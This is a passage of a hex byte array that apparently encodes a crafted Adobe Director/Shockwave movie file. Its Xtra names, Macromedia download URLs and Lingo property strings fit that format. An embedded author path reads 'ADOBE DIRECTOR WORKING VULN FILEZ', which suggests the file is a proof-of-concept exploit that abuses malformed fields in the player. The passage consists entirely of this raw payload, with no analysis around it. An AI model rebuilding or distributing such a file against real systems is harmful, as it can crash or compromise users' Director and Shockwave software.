0x2F, 0x53, 0x57, 0x41, 0x00, 0x21, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20, 0x44, 0x65, 0x63, 0x6F,

0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,

0x72, 0x61, 0x00, 0x41, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D, 0x70, 0x72, 0x2E, 0x78,

0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x01, 0x12, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00,

0x6C, 0x06, 0x05, 0x0F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E,

0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x42, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,

0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,

0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,

0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x44, 0x69,

0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x00, 0x41, 0x05, 0x0F, 0x44, 0x69, 0x72,

0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00,

0xC5, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x7E, 0x00,

0x00, 0x00, 0x93, 0x06, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74,

0x72, 0x6F, 0x6C, 0x00, 0x06, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E,

0x74, 0x72, 0x6F, 0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70,

0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72,

0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73,

0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72,

0x61, 0x73, 0x2F, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00,

0x21, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C,

0x00, 0x41, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F,

0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x91, 0x00, 0x00, 0x00, 0x18, 0x00, 0x01,

0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x57,

0x00, 0x00, 0x00, 0x67, 0x06, 0x02, 0x0C, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F,

0x4D, 0x69, 0x78, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,

0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,

0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,

0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x43, 0x6F,

0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x21, 0x02, 0x0C, 0x43, 0x6F,

0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x00, 0x00, 0x00, 0xC6, 0x00,

0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,

0x94, 0x06, 0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72,

0x73, 0x00, 0x06, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65,

0x72, 0x73, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x44, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,

0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,

0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,

0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,

0x2F, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x21,

0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00,

0x41, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73,

0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0C,

0x00, 0x00, 0x00, 0x14, 0x08, 0x49, 0x6E, 0x74, 0x65, 0x72, 0x6E, 0x61, 0x6C, 0x00, 0x00, 0x00,

0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x04, 0x00, 0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00,

0x00, 0x02, 0x00, 0x01, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x00, 0x02, 0x51, 0x4C, 0x4F, 0x43, 0x46,

0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11,

0x11, 0x11, 0x22, 0x22, 0x22, 0x33, 0x33, 0x33, 0x44, 0x44, 0x44, 0x55, 0x55, 0x55, 0x66, 0x66,

0x66, 0x77, 0x77, 0x77, 0x88, 0x88, 0x88, 0x99, 0x99, 0x99, 0xAA, 0xAA, 0xAA, 0xBB, 0xBB, 0xBB,

0xCC, 0xCC, 0xCC, 0xDD, 0xDD, 0xDD, 0xEE, 0xEE, 0xEE, 0xFF, 0xFF, 0xFF, 0x4C, 0x42, 0x55, 0x50,

0x99, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x02, 0x9C, 0x00, 0x00, 0x02,

0x76, 0xFF, 0xFF, 0xFF, 0x0C, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00,

0x66, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00,

0x74, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00,

0x6D, 0x00, 0x00, 0x00, 0x6C, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00,

0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00,

0x00, 0x74, 0x00, 0x00, 0x00, 0x6D, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00,

0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x64, 0x00,

0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x72, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45,

0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x6A,

0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x67, 0x0A, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00,

0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,

0x63, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,

0x73, 0x04, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00,

0x00, 0x54, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x01, 0x50, 0x01, 0x00,

0x00, 0x01, 0x01, 0x00, 0x01, 0x0D, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00, 0x77, 0x00, 0x00,

0x00, 0x43, 0x00, 0x00, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00,

0x00, 0x65, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00, 0x4D, 0x00, 0x00,

0x00, 0x65, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x75, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,

0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53,

0x54, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 0x00, 0x08, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x61, 0x70,

0x70, 0x00, 0x00, 0x00, 0x0C, 0x54, 0x45, 0x53, 0x54, 0x2E, 0x63, 0x6C, 0x61, 0x73, 0x73, 0x69,

0x63, 0x00, 0x00, 0x00, 0x08, 0x53, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x01, 0x00, 0x01,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x38, 0x30, 0x30, 0x30, 0x00, 0x00,

0x00, 0x00, 0x01, 0x30, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49,

0x52, 0x47, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x40, 0x00, 0x40, 0x00, 0x02,

0x00, 0x23, 0x00, 0x00, 0x00, 0xE6, 0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x02, 0x3A, 0x7E, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,

0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x08,

0x00, 0x00, 0x00, 0x00, 0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04,

0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00,

0x00, 0x1A, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x01, 0x00, 0x01, 0x00, 0x03,

0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x9F, 0x00, 0x00, 0x00, 0x00,

0x00, 0xBB, 0x05, 0x7A, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x04, 0x74, 0x53, 0x41, 0x43, 0x93, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,

0x00, 0x00, 0x00, 0x76, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00,

0x00, 0x0C, 0x4A, 0xB4, 0x0B, 0xEF, 0x4A, 0xB4, 0x0B, 0xEF, 0x4E, 0x2F, 0x41, 0x00, 0x00, 0x03,

0x00, 0x00, 0x00, 0x00, 0x00, 0x87, 0x00, 0xA4, 0x00, 0x01, 0xFF, 0x00, 0x01, 0x02, 0x05, 0x00,

0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x60, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x05,

0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,

0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,

0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,

0x00, 0x00, 0xFF, 0xFF, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x00, 0x03, 0x6D, 0x00, 0x14, 0x00, 0x69,

0x06, 0x66, 0x6F, 0x72, 0x67, 0x65, 0x74, 0x06, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x06, 0x72,

0x65, 0x74, 0x75, 0x72, 0x6E, 0x0D, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x50, 0x72, 0x65, 0x73,

0x65, 0x6E, 0x74, 0x03, 0x6E, 0x65, 0x77, 0x08, 0x66, 0x69, 0x6C, 0x65, 0x4E, 0x61, 0x6D, 0x65,

0x05, 0x74, 0x69, 0x74, 0x6C, 0x65, 0x07, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x09, 0x73,

0x70, 0x72, 0x69, 0x74, 0x65, 0x54, 0x61, 0x62, 0x07, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,

0x06, 0x73, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x06, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x07, 0x70,

0x69, 0x63, 0x74, 0x75, 0x72, 0x65, 0x09, 0x68, 0x65, 0x6C, 0x70, 0x54, 0x6F, 0x70, 0x69, 0x63,

0x17, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x44, 0x65, 0x73, 0x63, 0x72, 0x69, 0x70,

0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x61, 0x6D, 0x65, 0x06, 0x66, 0x6F,

0x72, 0x6D, 0x61, 0x74, 0x06, 0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x0A, 0x73, 0x74, 0x61, 0x72,

0x74, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x07, 0x69, 0x6E, 0x74, 0x65, 0x67, 0x65, 0x72, 0x08, 0x65,

0x6E, 0x64, 0x46, 0x72, 0x61, 0x6D, 0x65, 0x09, 0x73, 0x70, 0x72, 0x69, 0x74, 0x65, 0x4E, 0x75,

0x6D, 0x08, 0x65, 0x64, 0x69, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x07, 0x62, 0x6F, 0x6F, 0x6C, 0x65,

0x61, 0x6E, 0x06, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x05, 0x72, 0x61, 0x6E, 0x67, 0x65, 0x09,

0x66, 0x6F, 0x72, 0x65, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x09,

0x62, 0x61, 0x63, 0x6B, 0x43, 0x6F, 0x6C, 0x6F, 0x72, 0x05, 0x62, 0x6C, 0x65, 0x6E, 0x64, 0x03,

0x6D, 0x69, 0x6E, 0x03, 0x6D, 0x61, 0x78, 0x03, 0x69, 0x6E, 0x6B, 0x04, 0x6C, 0x6F, 0x63, 0x48,

0x04, 0x6C, 0x6F, 0x63, 0x56, 0x05, 0x77, 0x69, 0x64, 0x74, 0x68, 0x06, 0x68, 0x65, 0x69, 0x67,

0x68, 0x74, 0x08, 0x72, 0x6F, 0x74, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x05, 0x66, 0x6C, 0x6F, 0x61,

0x74, 0x04, 0x73, 0x6B, 0x65, 0x77, 0x05, 0x66, 0x6C, 0x69, 0x70, 0x48, 0x05, 0x66, 0x6C, 0x69,

0x70, 0x56, 0x06, 0x66, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x13, 0x69, 0x74, 0x65, 0x6D, 0x44, 0x65,

0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x69, 0x73, 0x74, 0x04, 0x6E, 0x6F,

0x74, 0x65, 0x04, 0x74, 0x79, 0x70, 0x65, 0x05, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x04, 0x74, 0x65,

0x78, 0x74, 0x04, 0x6C, 0x65, 0x66, 0x74, 0x03, 0x74, 0x6F, 0x70, 0x05, 0x72, 0x69, 0x67, 0x68,

0x74, 0x06, 0x62, 0x6F, 0x74, 0x74, 0x6F, 0x6D, 0x09, 0x6D, 0x65, 0x6D, 0x62, 0x65, 0x72, 0x54,

0x61, 0x62, 0x06, 0x6E, 0x75, 0x6D, 0x62, 0x65, 0x72, 0x0A, 0x63, 0x61, 0x73, 0x74, 0x4C, 0x69,

0x62, 0x4E, 0x75, 0x6D, 0x0A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x54, 0x65, 0x78, 0x74, 0x07,

0x67, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x70, 0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x69, 0x6F, 0x6E,

0x44, 0x61, 0x74, 0x65, 0x04, 0x64, 0x61, 0x74, 0x65, 0x0C, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69,

0x65, 0x64, 0x44, 0x61, 0x74, 0x65, 0x0A, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42,

0x79, 0x08, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x0D, 0x70, 0x75, 0x72, 0x67, 0x65,

0x50, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x08, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65,

0x64, 0x06, 0x6C, 0x69, 0x6E, 0x6B, 0x65, 0x64, 0x06, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x64, 0x05,

0x6D, 0x65, 0x64, 0x69, 0x61, 0x09, 0x74, 0x68, 0x75, 0x6D, 0x62, 0x6E, 0x61, 0x69, 0x6C, 0x04,

0x73, 0x69, 0x7A, 0x65, 0x0A, 0x6D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x73, 0x69, 0x7A, 0x65, 0x0A,

0x6D, 0x65, 0x64, 0x69, 0x61, 0x52, 0x65, 0x61, 0x64, 0x79, 0x0C, 0x67, 0x72, 0x61, 0x70, 0x68,

0x69, 0x63, 0x50, 0x72, 0x6F, 0x70, 0x73, 0x06, 0x68, 0x69, 0x6C, 0x69, 0x74, 0x65, 0x08, 0x72,

0x65, 0x67, 0x50, 0x6F, 0x69, 0x6E, 0x74, 0x05, 0x70, 0x6F, 0x69, 0x6E, 0x74, 0x04, 0x72, 0x65,

0x63, 0x74, 0x05, 0x61, 0x62, 0x6F, 0x75, 0x74, 0x06, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x0A,

0x65, 0x64, 0x69, 0x74, 0x53, 0x63, 0x72, 0x69, 0x70, 0x74, 0x04, 0x65, 0x64, 0x69, 0x74, 0x09,

0x6E, 0x61, 0x6D, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x09, 0x61, 0x6C, 0x69, 0x67, 0x6E, 0x6D,

0x65, 0x6E, 0x74, 0x08, 0x70, 0x72, 0x6F, 0x70, 0x65, 0x72, 0x74, 0x79, 0x09, 0x73, 0x69, 0x7A,

0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x06, 0x62, 0x72, 0x6F, 0x77, 0x73, 0x65, 0x07, 0x6F, 0x70,

0x74, 0x69, 0x6F, 0x6E, 0x73, 0x0A, 0x70, 0x75, 0x72, 0x67, 0x65, 0x4C, 0x61, 0x62, 0x65, 0x6C,

0x0C, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x4C, 0x61, 0x62, 0x65, 0x6C, 0x07, 0x63, 0x72,

0x65, 0x61, 0x74, 0x65, 0x64, 0x0D, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x4C, 0x61,

0x62, 0x65, 0x6C, 0x0F, 0x6D, 0x6F, 0x64, 0x69, 0x66, 0x69, 0x65, 0x64, 0x42, 0x79, 0x4C, 0x61,

0x62, 0x65, 0x6C, 0x0D, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x4C, 0x61, 0x62, 0x65,

0x6C, 0x05, 0x66, 0x69, 0x65, 0x6C, 0x64, 0x06, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x08, 0x73,

0x68, 0x61, 0x70, 0x65, 0x54, 0x61, 0x62, 0x05, 0x73, 0x68, 0x61, 0x70, 0x65, 0x06, 0x66, 0x69,

0x6C, 0x6C, 0x65, 0x64, 0x09, 0x73, 0x68, 0x61, 0x70, 0x65, 0x54, 0x79, 0x70, 0x65, 0x04, 0x6F,

0x76, 0x61, 0x6C, 0x09, 0x72, 0x6F, 0x75, 0x6E, 0x64, 0x52, 0x65, 0x63, 0x74, 0x04, 0x6C, 0x69,

0x6E, 0x65, 0x08, 0x6C, 0x69, 0x6E, 0x65, 0x53, 0x69, 0x7A, 0x65, 0x0B, 0x67, 0x72, 0x61, 0x6E,

0x75, 0x6C, 0x61, 0x72, 0x69, 0x74, 0x79, 0x0D, 0x6C, 0x69, 0x6E, 0x65, 0x44, 0x69, 0x72, 0x65,

0x63, 0x74, 0x69, 0x6F, 0x6E, 0x07, 0x70, 0x61, 0x74, 0x74, 0x65, 0x72, 0x6E, 0x00, 0x20, 0x6C,

0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x46, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46,

0x57, 0x56, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x01, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x61,

0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x63,

0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x66, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E,

0x2F, 0x41, 0x00, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E, 0x2F, 0x41, 0x00, 0x4A, 0x43,

0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20,

0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x6C, 0x71, 0x77, 0x72, 0x6D, 0x5C, 0x44,

0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x41, 0x44, 0x4F, 0x42, 0x45, 0x20, 0x44, 0x49, 0x52,

0x45, 0x43, 0x54, 0x4F, 0x52, 0x20, 0x57, 0x4F, 0x52, 0x4B, 0x49, 0x4E, 0x47, 0x20, 0x56, 0x55,

0x4C, 0x4E, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x5A, 0x5C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x53,

0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0xFF, 0xFF, 0xFF, 0xFD, 0x00, 0x00,

0x00, 0x0C, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x8C, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00,

0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00,

